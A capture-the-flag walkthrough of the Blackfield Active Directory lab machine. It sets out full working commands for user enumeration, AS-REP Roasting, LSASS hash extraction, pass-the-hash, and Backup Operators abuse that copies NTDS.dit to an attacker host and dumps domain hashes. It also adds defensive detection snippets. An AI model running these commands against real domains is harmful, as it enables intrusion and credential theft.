Overview
Blackfield is an Active Directory machine that demonstrates how exposed SMB profile data can be used to build a user list, leading to AS-REP Roasting, BloodHound-assisted lateral movement, LSASS credential extraction, and eventual domain compromise through Backup Operators privileges.
Attack Chain
- Enumerate Active Directory services and identify the domain
- Access profiles$ over SMB and build a potential user list
- Validate users with kerbrute
- AS-REP Roast valid users and crack the support hash
- Enumerate with BloodHound and identify ForceChangePassword over audit2020
- Reset the audit2020 password and access the forensic share
- Extract the svc_backup NTLM hash from an LSASS dump with pypykatz
- Gain WinRM access as svc_backup
- Abuse Backup Operators privileges to copy NTDS, SYSTEM, and SECURITY
- Dump domain hashes with impacket-secretsdump
- Pass the Administrator hash and obtain root
Enumeration
The initial enumeration starts with a full TCP scan to identify exposed services and confirm whether the target is part of an Active Directory environment.
Port Scanning
export IP=10.129.229.17; export NAME=BLACKFIELD; echo $IP; echo $NAME; ping $IP -c 1
nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME
ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports
nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v

Findings
The scan results show a clear Active Directory attack surface. DNS (53), Kerberos (88), RPC (135), LDAP (389), SMB (445), the Global Catalog (3268), and WinRM (5985) are exposed. The LDAP and SMB banners identify the domain as BLACKFIELD.local.
To confirm the LDAP naming context, we query the base DN.
ldapsearch -H ldap://$IP -x -s base namingcontexts

The domain is added to /etc/hosts so tools can resolve it correctly.
echo "$IP BLACKFIELD.local" | sudo tee -a /etc/hosts
SMB Enumeration
Share Access
With SMB exposed, the next step is to check for accessible shares.
smbclient -N -L //$IP/

Anonymous SMB enumeration does not behave cleanly, so netexec is used to test access more explicitly.
nxc smb $IP -u '' -p '' --shares

This returns STATUS_ACCESS_DENIED. However, when providing any username such as Guest with a blank password, the shares can be listed.
nxc smb $IP -u 'Guest' -p '' --shares

The profiles$ share is readable, which makes it the first useful enumeration target.
smbclient //$IP/profiles$

Building a User List
The profiles$ share contains many directories named like user profiles. This gives us a strong source for potential domain usernames.
The raw output is copied into a file called users_raw.txt.

The list is then cleaned into a single-column username list with awk.
cat creds/users_raw.txt | awk '{print $1}' > creds/users_potential.txt
head creds/users_potential.txt

Kerbrute Validation
The generated list is then validated with kerbrute to identify real domain users.
~/Tools/kerbrute/kerbrute_linux_amd64 userenum --domain blackfield.local --dc $IP creds/users_potential.txt

Three valid users are identified:
audit2020
support
svc_backup
To make the output easier to reuse, kerbrute is run again with the -o flag.
~/Tools/kerbrute/kerbrute_linux_amd64 userenum --domain blackfield.local --dc $IP creds/users_potential.txt -o creds/kerbrute.userenum.lst
The valid usernames are extracted into clean lists.
grep VALID creds/kerbrute.userenum.lst | awk '{print $7}' | awk -F\@ '{print $1}' > creds/users.txt

grep VALID creds/kerbrute.userenum.lst | awk '{print $7}' | awk -F\@ '{print $2"\\"$1}' > creds/domain_users.txt

Foothold
AS-REP Roasting
With valid usernames available, we check whether any account has Kerberos pre-authentication disabled. This is done using impacket-GetNPUsers, which performs an AS-REP Roasting attack.
impacket-GetNPUsers blackfield/ -dc-ip $IP -no-pass -usersfile creds/users.txt -outputfile creds/hashes.aseproast

The support account returns an AS-REP hash. Since this can be cracked offline, it is passed to hashcat.
hashcat -m 18200 creds/hashes.aseproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

The password is recovered successfully.
support:#00^BlackKnight
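From the defender's side, the same weakness can be found before an attacker does and the roast itself can be spotted in the Security log. This is an added example, not part of the original writeup: it audits constructed user records for the DONT_REQ_PREAUTH flag and flags constructed 4768 events that carry the AS-REP Roasting signature (Pre-Authentication Type 0 with an RC4 ticket, the etype that hashcat mode 18200 above cracks). All account names and IPs in the samples are constructed.

```python
# Added defensive example (not from the original writeup). Two checks:
#  1. which accounts are roastable (userAccountControl has DONT_REQ_PREAUTH)
#  2. which 4768 TGT-request events look like an AS-REP Roast
from dataclasses import dataclass

DONT_REQ_PREAUTH = 0x400000   # UAC bit that makes an account roastable
NORMAL_ACCOUNT = 0x200
DONT_EXPIRE_PASSWD = 0x10000

# Constructed LDAP-style attributes; only 'support' has pre-auth disabled.
SAMPLE_USERS = {
    "support":    {"userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH},
    "audit2020":  {"userAccountControl": NORMAL_ACCOUNT},
    "svc_backup": {"userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD},
}


def roastable_accounts(users):
    """Return accounts whose userAccountControl has DONT_REQ_PREAUTH set."""
    return sorted(name for name, attrs in users.items()
                  if attrs["userAccountControl"] & DONT_REQ_PREAUTH)


@dataclass
class Kerb4768:
    """Subset of the fields in Security event 4768 (TGT requested)."""
    account: str
    client_ip: str
    preauth_type: int   # 0 = no pre-authentication, 2 = PA-ENC-TIMESTAMP
    ticket_enc: int     # 0x17 = RC4-HMAC (etype 23), 0x12 = AES256


# Constructed events: a normal AES logon and one matching the GetNPUsers pattern.
SAMPLE_4768 = [
    Kerb4768("audit2020", "10.129.229.50", preauth_type=2, ticket_enc=0x12),
    Kerb4768("support",   "10.129.229.99", preauth_type=0, ticket_enc=0x17),
]


def asrep_roast_alerts(events):
    """4768 with Pre-Authentication Type 0 and an RC4 ticket is the roast signature."""
    return [(e.account, e.client_ip) for e in events
            if e.preauth_type == 0 and e.ticket_enc == 0x17]


if __name__ == "__main__":
    print("roastable:", roastable_accounts(SAMPLE_USERS))
    print("alerts:", asrep_roast_alerts(SAMPLE_4768))
```

Clearing the flag on the audited accounts removes the exposure; the 4768 rule catches the request even if the flag is later re-enabled.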
Authenticated SMB Enumeration
The new credentials are tested. WinRM access is not available for support, but SMB authentication works, so we enumerate shares again.
nxc smb $IP -u 'support' -p '#00^BlackKnight' --shares

The NETLOGON and SYSVOL shares are readable, but recursive enumeration does not reveal anything useful.
python3 ~/Tools/smbmap/smbmap/smbmap.py -H $IP -u "support" -p "#00^BlackKnight" -r NETLOGON --depth 7
python3 ~/Tools/smbmap/smbmap/smbmap.py -H $IP -u "support" -p "#00^BlackKnight" -r SYSVOL --depth 15
Active Directory Enumeration
RPC User Enumeration
Since SMB does not immediately reveal a path forward, we use the support credentials with rpcclient.
rpcclient --user blackfield.local/support --password=#00^BlackKnight $IP
Once authenticated, domain users are enumerated.
enumdomusers

This returns a much larger list of domain users. The output is saved and cleaned into a file.
cat creds/rpc_users_raw.txt | awk -F \[ '{print $2}' | awk -F \] '{print $1}' > creds/rpc_users.txt

Several password spraying, AS-REP Roasting, and Kerberoasting attempts are tested against the larger list, but no new credentials are recovered.
BloodHound Enumeration
To look for a relationship-based attack path, bloodhound-python is used to collect Active Directory data.
bloodhound-python -d blackfield.local -u support -p '#00^BlackKnight' -c all -ns $IP
After importing the data into BloodHound, the support user is marked as owned and the Shortest Paths from Owned Objects query is reviewed.

BloodHound reveals that support has ForceChangePassword rights over the audit2020 account.

Lateral Movement
Resetting audit2020
Since support can change the password for audit2020, we use net rpc to set a known password.
net rpc password audit2020 Password1234! -U blackfield.local/support%#00^BlackKnight -S $IP
The credentials are then tested with netexec.
nxc smb $IP -u audit2020 -p 'Password1234!'

Accessing the forensic Share
With access as audit2020, SMB shares are enumerated again.
python3 ~/Tools/smbmap/smbmap/smbmap.py -H $IP -u "audit2020" -p "Password1234\!"

The forensic share is now readable. Because smbmap struggles to enumerate it cleanly, we connect manually using smbclient.
smbclient //$IP/forensic --user=blackfield.local/audit2020 --password='Password1234!'

To make the share easier to browse, it is mounted locally.
sudo mount -t cifs -o 'username=audit2020,password=Password1234!' //$IP/forensic /mnt

Inside the memory_analysis directory, an lsass.zip file stands out. Since LSASS can contain credential material, this is immediately worth investigating.
The archive is copied and extracted.
cp /mnt/memory_analysis/lsass.zip .
unzip lsass.zip

Extracting Credentials from LSASS
The LSASS dump is parsed with pypykatz.
pypykatz lsa minidump lsass.DMP

This reveals an NTLM hash for the svc_backup account. An Administrator hash is also visible, but it does not authenticate successfully.
svc_backup:9658d1d1dcd9250115e2205d9f48400d
The svc_backup hash is tested against WinRM.
nxc winrm $IP -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'

WinRM access is confirmed, so an interactive shell is opened.
evil-winrm -i $IP -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'

We can now read the user flag.
type C:\Users\svc_backup\Desktop\user.txt

Privilege Escalation
Initial Enumeration
After gaining a shell as svc_backup, we check the account details and group membership.
net user svc_backup /domain

The account is a member of Backup Operators, which is highly significant on a domain controller.
We confirm the enabled privileges.
whoami /priv

Both SeBackupPrivilege and SeRestorePrivilege are enabled. This gives us a path to copy protected system files and extract domain hashes.
Preparing Diskshadow
To access locked files like NTDS.dit, we create a shadow copy of the C: drive using diskshadow.
A local script is created with the following contents:
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit
The script is transferred to the target.
iwr -uri http://10.10.14.89/cmd -o c:\windows\temp\cmd

The first attempt to run diskshadow does not process the script correctly.
diskshadow /s c:\windows\temp\cmd

The issue is the line-ending format: diskshadow expects Windows (CRLF) line endings. We create a duplicate called diskshadow.txt and convert it to DOS format with unix2dos.
unix2dos diskshadow.txt

The corrected script is transferred and executed.
iwr -uri http://10.10.14.89/diskshadow.txt -o c:\windows\temp\diskshadow.txt
diskshadow /s c:\windows\temp\diskshadow.txt

The shadow copy is exposed as H:.
Copying Protected Files
To make full use of SeBackupPrivilege, we download the PowerShell modules from the SeBackupPrivilege project.
https://github.com/giuliano108/SeBackupPrivilege
iwr -uri http://10.10.14.89/SeBackupPrivilege/SeBackupPrivilegeCmdLets.dll -o ./SeBackupPrivilegeCmdLets.dll
iwr -uri http://10.10.14.89/SeBackupPrivilege/SeBackupPrivilegeUtils.dll -o ./SeBackupPrivilegeUtils.dll

Now we can import the PowerShell modules:
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
We copy the required files from the shadow copy into C:\Windows\Temp.
Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SECURITY c:\windows\temp\SECURITY -Overwrite
The files are now visible in C:\Windows\Temp.

They are transferred back to the attacking machine over SMB.
copy c:\windows\temp\NTDS \\10.10.14.89\SMBtransfer\NTDS
copy c:\windows\temp\SYSTEM \\10.10.14.89\SMBtransfer\SYSTEM
copy c:\windows\temp\SECURITY \\10.10.14.89\SMBtransfer\SECURITY

Dumping Domain Hashes
Once the files are local, impacket-secretsdump is used to extract the domain hashes.
impacket-secretsdump -ntds NTDS -security SECURITY -system SYSTEM LOCAL

The Administrator NTLM hash is recovered.
Administrator:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee
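The escalation above leaves a recognisable trail on the domain controller: a logon that receives SeBackupPrivilege/SeRestorePrivilege (event 4672) followed by diskshadow.exe being launched with a script (event 4688, which needs command-line auditing enabled). This is an added example, not part of the original writeup: it correlates constructed events of those two types and reports backup-privileged logons outside an assumed allowlist, and any such account that then runs diskshadow or references ntds.dit. The allowlist name and all sample events are constructed.

```python
# Added defensive example (not from the original writeup): correlate 4672
# (special privileges assigned) with 4688 (process creation) to surface the
# Backup Operators -> diskshadow -> NTDS.dit chain. Inputs are constructed.
import re

# Hypothetical allowlist of accounts expected to receive backup privileges.
EXPECTED_BACKUP_ACCOUNTS = {"BLACKFIELD\\backup_svc_ok"}
BACKUP_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}

# Command lines worth an alert once backup privileges are in play: diskshadow
# driven by a script file, or anything that names the AD database directly.
SUSPICIOUS_CMD = re.compile(r"diskshadow(\.exe)?\s+/s\b|ntds\.dit", re.I)

# Constructed Security-log records (only the fields the rules need).
SAMPLE_EVENTS = [
    {"id": 4672, "account": "BLACKFIELD\\svc_backup",
     "privileges": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"id": 4688, "account": "BLACKFIELD\\svc_backup", "cmdline": "whoami /priv"},
    {"id": 4688, "account": "BLACKFIELD\\svc_backup",
     "cmdline": r"diskshadow /s c:\windows\temp\diskshadow.txt"},
    {"id": 4672, "account": "BLACKFIELD\\backup_svc_ok", "privileges": "SeBackupPrivilege"},
    {"id": 4688, "account": "BLACKFIELD\\audit2020", "cmdline": "notepad.exe"},
]


def unexpected_backup_logons(events):
    """Accounts granted a backup privilege (4672) that are not on the allowlist."""
    hits = {e["account"] for e in events
            if e["id"] == 4672
            and BACKUP_PRIVS & set(e["privileges"].split())
            and e["account"] not in EXPECTED_BACKUP_ACCOUNTS}
    return sorted(hits)


def backup_operator_alerts(events):
    """(account, cmdline) pairs: a flagged account running a suspicious command."""
    flagged = set(unexpected_backup_logons(events))
    return [(e["account"], e["cmdline"]) for e in events
            if e["id"] == 4688 and e["account"] in flagged
            and SUSPICIOUS_CMD.search(e["cmdline"])]


if __name__ == "__main__":
    print("unexpected backup logons:", unexpected_backup_logons(SAMPLE_EVENTS))
    print("alerts:", backup_operator_alerts(SAMPLE_EVENTS))
```

Note that copies made with Copy-FileSeBackupPrivilege run inside the existing PowerShell process and produce no 4688, so the diskshadow launch and the 4672 grant are the reliable hooks; membership of Backup Operators on a domain controller should itself be reviewed, since it is equivalent to Domain Admin.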
Administrator Access
The recovered hash is validated with netexec.
nxc smb $IP -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'
nxc winrm $IP -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'

With WinRM confirmed, we authenticate using pass-the-hash.
evil-winrm -i $IP -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'

Root Flag:
type C:\Users\Administrator\Desktop\root.txt

Key Takeaways
Blackfield shows how exposed profile data can quickly become a reliable username source. From there, AS-REP Roasting provides the first credential, while BloodHound reveals a clean lateral movement path through ForceChangePassword. The final escalation comes from Backup Operators, where enabled backup privileges allow sensitive domain files to be copied and dumped for full Administrator access.